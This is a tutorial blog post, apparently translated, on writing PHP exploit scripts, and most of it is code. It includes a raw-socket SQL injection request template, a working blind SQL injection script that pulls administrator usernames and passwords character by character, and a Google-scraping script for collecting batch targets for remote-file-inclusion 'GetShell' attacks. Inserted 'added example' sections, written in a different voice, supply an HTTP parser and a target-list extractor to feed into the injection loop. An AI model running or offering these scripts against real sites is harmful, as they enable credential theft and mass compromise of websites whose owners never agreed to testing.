Writing a general-purpose PHP exploit framework


0x01 Preface
Now that easy, conventional vulnerabilities are rare, many of the popular injection testing tools cannot cope with unconventional injection points, and the flexibility of a script makes it easy to test exactly those. The most common approach is to use a script to forward HTTP requests so that an injection tool can work through it. Here I want to discuss writing PHP Exps, which can be used directly for injection or for batch GetShell.
 
0x02 PHP socket functions
PHP is powerful and easy to use. Its standard library wraps the socket API (Winsock on Windows) in functions such as fsockopen, fwrite, fgets, fgetss, fclose and feof (fgetss was deprecated in PHP 7.3 and removed in 8.0). An Exp usually extracts the administrator's account through injection, so the process can be roughly abstracted as:
1. Print usage and other information
2. Build the request
3. Send the request in a loop
4. Read the result and print it
The code below walks through it.
 
PHP code
<?php
// Adjust the script timeout and error reporting as needed.
error_reporting(E_ERROR);
set_time_limit(0);

// Banner; optional.
print_r('
---------------------------
xxxxxxx SQL injection
xxxxxxx exploit
BY xxxxxx
---------------------------
');

// An Exp is normally run from the command line and takes its arguments there.
if ($argc < 3) {
    // $argc is the number of arguments (three here, counting the script name); $argv holds
    // their values, and $argv[0] is the script's own file name.
    print_r('
---------------------------
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname), without "http://"
Path: path to phpcms
Example:
php ' . $argv[0] . ' localhost /
---------------------------
');
    die;
}

// Read the arguments; adjust as needed.
$host = $argv[1];
$path = $argv[2];
$html = '';

// Build the request.
$cookie  = "";
$agent   = "Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";
$content = "";
// The request method depends on the injection point: sometimes GET, sometimes POST.
$data  = "POST /xxxxxx/bug.php?aid=1 HTTP/1.1\r\n";
$data .= "Host: " . $host . "\r\n";
// $data .= "Cookie: " . $cookie . "\r\n";
$data .= "User-Agent: " . $agent . "\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
// $data .= "Accept-Encoding: gzip, deflate\r\n";
// Some sites have gzip enabled; check what the browser sends with a capture tool such as
// Live HTTP Headers, but leave Accept-Encoding out here so the response is not compressed.
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
// Connection: close rather than keep-alive: the read loop in sendpack() runs until the
// server closes the socket, and a kept-alive connection would hang until the idle timeout.
$data .= "Connection: close\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: " . strlen($content) . "\r\n";
$data .= "\r\n";                 // blank line ends the headers
$data .= $content;

// Send the request.
sendpack($data);

// Everything returned is in the string $html; use a regex or string function to pull
// out the result. (The original used eregi(), which was removed in PHP 7.)
if (stripos($html, "created_time") === false) {
    echo $data . "\r\n";
    echo $html . "\r\n";
    die("Exploit failed...");
} else {
    $pattern = "";          // regex that extracts the result; fill in per target
    preg_match($pattern, $html, $pg);
    // $html =
    // further checks on $html after matching...
    echo "\r\nExploit succeeded...\r\n";
}

// Wrap the sending in a function.
function sendpack($packet)
{
    global $host, $html;
    $ock = fsockopen(gethostbyname($host), 80);
    if (!$ock) {
        echo 'no response from ' . $host;
        die;
    }
    fputs($ock, $packet);
    $html = '';
    while (!feof($ock)) {
        $html .= fgets($ock);
    }
    fclose($ock);
}
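The sendpack() pattern above hands back the raw bytes of the response, which is fine until the server answers with a chunked body or keeps the connection open. The following is an added example, not code from the original post: a small raw-HTTP helper in the same style that builds a correctly terminated request (headers, blank line, then body), reads the reply to EOF, and parses status line, headers and a chunked or Content-Length-delimited body. The function names (build_request, parse_response, decode_chunked, http_send) are this example's own, and the sample response at the bottom is constructed so the parser can be exercised offline.

```php
<?php
// Added example, not from the original post. Builds a well-formed HTTP/1.1 request and
// parses a raw response, including chunked transfer encoding.

function build_request($method, $path, $host, array $headers = array(), $body = '') {
    $req  = strtoupper($method) . ' ' . $path . " HTTP/1.1\r\n";
    $req .= "Host: " . $host . "\r\n";
    $req .= "Connection: close\r\n";          // so a read-to-EOF loop terminates
    foreach ($headers as $name => $value) {
        $req .= $name . ": " . $value . "\r\n";
    }
    if ($body !== '' || strtoupper($method) === 'POST') {
        $req .= "Content-Length: " . strlen($body) . "\r\n";
    }
    return $req . "\r\n" . $body;            // blank line separates headers from body
}

// Decode a chunked body (RFC 7230 section 4.1); chunk extensions after ';' are ignored.
function decode_chunked($data) {
    $out = '';
    $pos = 0;
    $len = strlen($data);
    while ($pos < $len) {
        $eol = strpos($data, "\r\n", $pos);
        if ($eol === false) break;
        list($sizehex) = explode(';', substr($data, $pos, $eol - $pos));
        $size = hexdec(trim($sizehex));
        if ($size == 0) break;               // last-chunk marker
        $out .= substr($data, $eol + 2, $size);
        $pos  = $eol + 2 + $size + 2;        // skip chunk data and its trailing CRLF
    }
    return $out;
}

// Split a raw response into status code, lower-cased header map and decoded body.
function parse_response($raw) {
    $parts   = explode("\r\n\r\n", $raw, 2);
    $lines   = explode("\r\n", $parts[0]);
    $body    = isset($parts[1]) ? $parts[1] : '';
    $status  = (int) substr(array_shift($lines), 9, 3);   // "HTTP/1.1 200 OK" -> 200
    $headers = array();
    foreach ($lines as $line) {
        $colon = strpos($line, ':');
        if ($colon === false) continue;
        $headers[strtolower(trim(substr($line, 0, $colon)))] = trim(substr($line, $colon + 1));
    }
    if (isset($headers['transfer-encoding']) && stripos($headers['transfer-encoding'], 'chunked') !== false) {
        $body = decode_chunked($body);
    } elseif (isset($headers['content-length'])) {
        $body = substr($body, 0, (int) $headers['content-length']);
    }
    return array('status' => $status, 'headers' => $headers, 'body' => $body);
}

// Send a request over a plain socket and return the parsed response, or null on failure.
function http_send($host, $port, $request, $timeout = 10) {
    $sock = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$sock) return null;
    stream_set_timeout($sock, $timeout);
    fwrite($sock, $request);
    $raw = '';
    while (!feof($sock)) {
        $raw .= fread($sock, 8192);
    }
    fclose($sock);
    return parse_response($raw);
}

// Constructed sample response (not captured from any real server): a chunked body is
// exactly the case the fgets()-to-EOF loop in sendpack() would return undecoded.
$sample = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\n\r\n"
        . "b\r\ncreated_tim\r\n1\r\ne\r\n0\r\n\r\n";
$resp = parse_response($sample);
printf("status=%d body=%s\n", $resp['status'], $resp['body']);

// Live use against a hypothetical target (names are placeholders, not from the post):
// $req  = build_request('POST', '/xxxxxx/bug.php?aid=1', $argv[1], array('User-Agent' => 'Mozilla/5.0'), 'q=1');
// $resp = http_send($argv[1], 80, $req);
```

With this helper the keyword check in the script above becomes a test on $resp['body'] rather than on the raw stream, and a 302, 404 or gzip-compressed answer is visible in $resp['status'] and $resp['headers'] instead of silently failing the regex.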
 
0x03 Using the cURL library
Besides the socket functions, PHP also ships with the more powerful cURL library, which can do considerably more. Here is the code directly; for further cURL usage see its official documentation.
 
PHP code
<?php
set_time_limit(0);

// Read the arguments.
$url = $argv[1];
$id  = $argv[2];
$opt = $argv[3];

// Usage message.
if (count($argv) != 4) {
    print_r('
xxxxxxxxx SQL Injection
');
} else {
    preg_match_all("/content to be matched.../", GET($url), $dat, PREG_SET_ORDER);
    if (!$dat) {
        echo "failed...\n";
    } else {
        // Matching data found...
        echo "xxxx SQL Injection\n";
        // Pick what to extract; other options can be added here.
        if ($opt == "-u") {
            $var = "username";
        } elseif ($opt == "-p") {
            $var = "password";
        } else {
            echo "[+] Parametros Incorrectos\n";
            exit();
        }

        echo $var . ":\n";
        // Candidate character codes (0-9, a-z, _ and a few others) for guessing.
        $ansi = genera_ansii();
        // Build the injected query; $var selects the column.
        $query = "select+" . $var . "+from+admin_users+where+id=" . $id;
        // Fetch the original page for comparison. A keyword check would also work; here the
        // number of lines in the response is used.
        $original = contar($url);

        // Guess loop: $i is the character position, $c the candidate character code.
        $name  = '';
        $i     = 1;
        $count = count($ansi);
        for ($x = 0; $x < $count; $x++) {
            $c = $ansi[$x];
            // sqlexec() wraps the query in an ascii(substring()) comparison; it can be
            // extended to something more complete.
            $urlblind = $url . sqlexec($query . "+limit+0,1", $i) . $c;
            $blind = contar($urlblind);
            // If the condition holds, the "and 1=1" page comes back: keep the character,
            // move to the next position and restart the candidate loop.
            if ($blind == $original) {
                $name .= chr($c);
                echo ":>" . $name . chr(8);
                $i++;
                $x = -1;
            }
            echo chr($c) . chr(13);
        }
        echo "\nResult:>" . $name . "\n";
    }
}

// Helper functions

function GET($url) {
    // Initialise cURL and build the headers; trimmed here.
    $curl = curl_init();
    $header = array();
    $header[] = "Cache-Control: max-age=0";
    $header[] = "Connection: keep-alive";
    $header[] = "Keep-Alive: 300";
    // Add more as needed. curl_setopt() sets each cURL option.
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1');
    curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
    curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
    curl_setopt($curl, CURLOPT_AUTOREFERER, true);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    if (!($html = curl_exec($curl))) {
        $html = file_get_contents($url);
    }
    curl_close($curl);
    return $html;
}

function contar($host) {
    return count(explode("\n", GET($host)));
}

function sqlexec($sql, $i) {
    return "+and+ascii(substring((" . $sql . ")," . $i . ",1))=";
}

function genera_ansii() {
    $ansi = array();
    for ($x = 45; $x <= 122; $x++) { // 0-9, a-z, _ (plus - and .)
        if ($x == 47) {
            $x++;           // skip '/'
        }
        if ($x == 58) {
            $x = $x + 37;   // jump from ':' to '_'
        }
        if ($x == 96) {
            $x++;           // skip '`'
        }
        $ansi[] = $x;
    }
    return $ansi;
}
 
0x04 A batch GetShell example
Batch GetShell generally targets RFI vulnerabilities; here is only a small example that scrapes Google results in batch. Combined with the previous scripts, only minor changes are needed for batch injection or GetShell.
 
PHP code
<?php
$keywords = urlencode($argv[1]);
// Substring a result link must contain to count as a hit. The original left $url_s
// undefined; taking it from the second argument is an assumption made here.
$url_s = isset($argv[2]) ? $argv[2] : '';
$html  = google($keywords);
$match = '!<div\s*id="search">(.*)</div>\s+<\!--z-->!';
preg_match_all($match, $html, $line);
// print_r($line);
foreach ($line[0] as $k => $v) {
    preg_match_all('!<h3\s+class="r"><a[^>]+>(.*?)</a>!', $v, $title);
    $num = count($title[1]);
    for ($i = 0; $i < $num; $i++) {
        if ($url_s !== '' && strstr($title[0][$i], $url_s)) {
            $j = $i + 1;
            echo $title[0][$i] . "\n";   // the matching result link
            // echo $url;
            break;
        }
    }
}
unset($html);

function google($key) {
    // Search endpoint
    $url = "http://www.google.com/search?sclient=psy-ab&hl=en&site=&source=hp&q=$key";
    // Google's cookies are captured manually from a browser, since they change at any time
    $cookie_file = dirname(__FILE__) . "/googlecookies.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, 'set the User-Agent as in the previous scripts');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);   // send the captured cookies
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);    // and save any updates
    $contents = curl_exec($ch);
    curl_close($ch);
    return $contents;
}
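The regex above is tied to one exact markup layout and breaks as soon as an attribute is reordered or a tag is wrapped. The following is an added example, not code from the original post: it extracts the same "h3.r > a" result links with DOMDocument and XPath, unwraps "/url?q=" redirect links, and reduces the hits to a de-duplicated host list that the injection scripts above can be pointed at. The HTML is constructed to mirror the layout the post's regex expects and is not a real search response; the function names extract_result_links and filter_targets are this example's own.

```php
<?php
// Added example, not from the original post: DOM-based extraction of search result links.

function extract_result_links($html) {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);          // real pages are rarely well-formed
    $doc->loadHTML($html);
    libxml_clear_errors();
    $xp    = new DOMXPath($doc);
    $links = array();
    foreach ($xp->query('//h3[@class="r"]/a[@href]') as $a) {
        $href = $a->getAttribute('href');
        // Redirect-style links wrap the target in /url?q=...; unwrap them.
        if (strpos($href, '/url?') === 0) {
            parse_str(parse_url($href, PHP_URL_QUERY), $q);
            if (isset($q['q'])) $href = $q['q'];
        }
        if (parse_url($href, PHP_URL_SCHEME) === null) continue;   // skip relative/internal links
        $links[] = array(
            'title' => trim($a->textContent),
            'url'   => $href,
            'host'  => parse_url($href, PHP_URL_HOST),
        );
    }
    return $links;
}

// Keep only results whose URL contains the marker the search was targeting (for example the
// path of a vulnerable script) and return the distinct hosts.
function filter_targets(array $links, $marker) {
    $hosts = array();
    foreach ($links as $l) {
        if (strpos($l['url'], $marker) !== false) $hosts[$l['host']] = true;
    }
    return array_keys($hosts);
}

// Constructed sample page (not a real search response).
$sample = '<html><body><div id="search">'
        . '<h3 class="r"><a href="http://example.com/phpcms/index.php?id=1">Example site</a></h3>'
        . '<h3 class="r"><a href="/url?q=http://example.org/phpcms/member.php&amp;sa=U">Second hit</a></h3>'
        . '<h3 class="r"><a href="http://example.net/blog/">Unrelated</a></h3>'
        . '</div><!--z--></body></html>';
print_r(filter_targets(extract_result_links($sample), '/phpcms/'));
```

Feeding the returned host list into the first script's $host loop is what turns it into the batch run the section describes; the marker filter is the place to require the exact vulnerable path rather than any mention of the product name.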
 
0x05 Summary
Finally, many people think running an Exp needs a complete PHP environment, which is not the case. In general you only need to ship php.exe and php5ts.dll to use the socket functions; if you also want the cURL library, include php_curl.dll and load it through PHP's command-line options (for example php -d extension=php_curl.dll script.php).
My skills are limited and the scripts here are not very general, but with small modifications to this base they should be usable in practice. Many experts also write general SQLi tools in scripting languages, sqlmap in Python for instance, and I think script-driven, step-by-step penetration is the trend. PHP's many convenient extensions let it do a great deal in penetration testing; this post is only a starting point for further exploration.

From DarkRay's blog.
